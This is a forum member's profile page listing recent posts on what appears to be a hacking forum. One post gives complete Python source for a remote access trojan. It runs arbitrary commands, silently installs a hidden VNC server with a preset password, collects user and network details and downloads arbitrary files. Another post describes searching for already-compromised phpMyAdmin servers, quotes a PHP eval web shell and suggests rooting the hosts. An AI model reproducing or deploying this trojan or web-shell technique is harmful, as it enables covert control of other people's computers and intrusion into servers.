Jump to content

DingleBerries

Dedicated Members
  • Posts

    1,291
  • Joined

  • Last visited

Profile Information

  • Gender
    Male
  • Location
    Tennessee

Recent Profile Visitors

17,354 profile views

DingleBerries's Achievements

Newbie

Newbie (1/14)

  1. Why not try the httpd exploit for dd-wrt? I dont know if it will work but it is worth a try.
  2. There are going to be a bunch more "0-days" over the next few months that are going to be bogus. Some of them now are nothing but malware. Be wary of what you run.
  3. Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data. from Tkinter import * from tkMessageBox import * from ScrolledText import * import socket import sys portvar = 2727 try: if sys.argv[1] == "/port": try: portvar = int(sys.argv[2]) except: portvar = 2727 except: portvar = 2727 def std(string): stdbox.config(state=NORMAL) stdbox.insert(END,"" + string + "\n") stdbox.config(state=DISABLED) def cnnect(var="poo"): sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) success = 1 try: sockt.connect((ipbox.get(),portvar)) except: success = 0 std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.") if success == 1: sockt.send(cmdbox.get()) retdata = sockt.recv(2048) std(retdata) root = Tk() root.title("Terry the Trojan") #FRAMES ipfrm = Frame(root) ipfrm.pack() cmdfrm = Frame(root) cmdfrm.pack() stdfrm = Frame(root) stdfrm.pack() #IP/Port Entry Widgets Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1) ipbox = Entry(ipfrm,width=50) ipbox.grid(row=1,column=2) #Returned output widgets stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000") stdbox.grid(row=1,column=1) #Command sending widgets cmdbox = Entry(cmdfrm,width=50) cmdbox.grid(row=1,column=1) Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2) cmdbox.bind("<Return>",cnnect) root.mainloop() HAH shit wrong code. Ill post it in a min. OK HERE is the RAT, sorry about that. You should be able to tell what the commands do. import socket,os,sys,urllib,re,ftplib from time import sleep port = 2727 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sockt.bind(('',port)) sockt.listen(1) while True: channel, details = sockt.accept() command = channel.recv(2048) if command == "kill": channel.send("Server trojan has been closed.") sys.exit() elif command == "ip": connect = s.connect(("www.whatismyipaddress.com", 80)) s.send('GET / HTTP/1.0\n\n') socketlines = s.recv(2048) lines = socketlines.split() ip = lines[len(lines) - 1] channel.send(ip) elif command == "whoami": channel.send(os.environ["USERNAME"]) elif command == "drive": channel.send(os.environ["HOMEDRIVE"]) elif command == "userfolder": channel.send(os.environ["HOMEPATH"]) elif command == "installvnc": urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe') fs=os.popen3('update.exe /sp- /verysilent','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(1) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(0.2) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(0.5) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(0.3) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(1) fs=os.popen3('net start "VNC Server"','b') fs=os.popen3('del update.exe','b') channel.send("VNC was installed, password is vncserv.") elif command == "netstat": fs=os.popen3('netstat -ano>windsys.ini','b') sleep(2) f = open('windsys.ini') channel.send(f.read()) f.close() elif command == "whereami": channel.send(os.getcwd()) elif command.startswith("download "): file = command.replace("download ", "") urllib.urlretrieve(file,"file.exe") channel.send("File downloaded. Saved as 'file.exe', rename extension") else: csuc = 1 try: fs=os.popen3(command,'b') except: csuc = 0 if csuc == 1: channel.send("Command Sucessful") else: channel.send("Command Failed") channel.close()
  4. To much processing power. You will need a big ass router.
  5. If you could get Airpwn running on a fon or other FOSS router then I think that would be more than enough.
  6. I havent played around with PHPbb, but I know other forums that send you a reset link. If anything I'd expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me. Just saw you post Vako. Glad they were hashed. Good luck BFing the good ones.
  7. Python can do that with ease. This code does it for google groups but can be easily modified to fit your needs.
  8. Darren has the complied version of it on his site, link. I also have the AESkey find compiled if anyone needs that.
  9. My favorite way is to use the "Welcome to phpMyAdmin" AND " Create new database" dork and find databases that have already been poped. Look for <?php eval($_POST[cmd]);?> And try to find the page where you send commands. That or root the box your self from there.
  10. Why am I being email a plain text password when I try to recover my account? I know that I should change it but I am not sure if other are sure about what to do.
  11. http://twitter.com/hak5darren/status/1664879332 If you havent solved it dont try to help with it.
×
×
  • Create New...